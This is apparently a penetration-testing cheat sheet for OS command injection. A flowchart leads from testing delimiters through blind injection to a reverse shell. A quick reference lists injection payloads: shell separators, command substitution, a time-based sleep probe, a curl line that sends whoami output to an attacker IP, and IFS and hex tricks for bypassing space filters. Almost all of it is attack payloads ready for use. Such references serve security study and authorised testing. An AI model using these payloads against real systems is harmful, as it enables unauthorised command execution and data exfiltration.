Command Injection Flow
Injecting OS commands
Command Injections
Mind Map
graph TD
A[Input Field] --> B[Test Delimiters]
B --> C["; | && ||"]
C --> D{Output Visible?}
D -->|Yes| E[Direct Injection]
D -->|No| F[Blind Injection]
E --> G[ls / whoami]
F --> H["Time Based (sleep)"]
F --> I["Out of Band (curl)"]
G --> J[Reverse Shell]
H --> J
Quick Reference
Basic
; id       # Semicolon separator
| id       # Pipe separator
|| id      # OR separator (runs if first fails)
& id       # Background separator
&& id      # AND separator (runs if first succeeds)
$(id)      # Command substitution
`id`       # Backtick substitution
Blind
; sleep 5                              # Time-based blind check
| curl http://10.10.14.5/$(whoami)     # Out-of-band data exfiltration
Filter Bypass
${IFS} # Use IFS environment variable for space
$'\x20' # Use hex code for space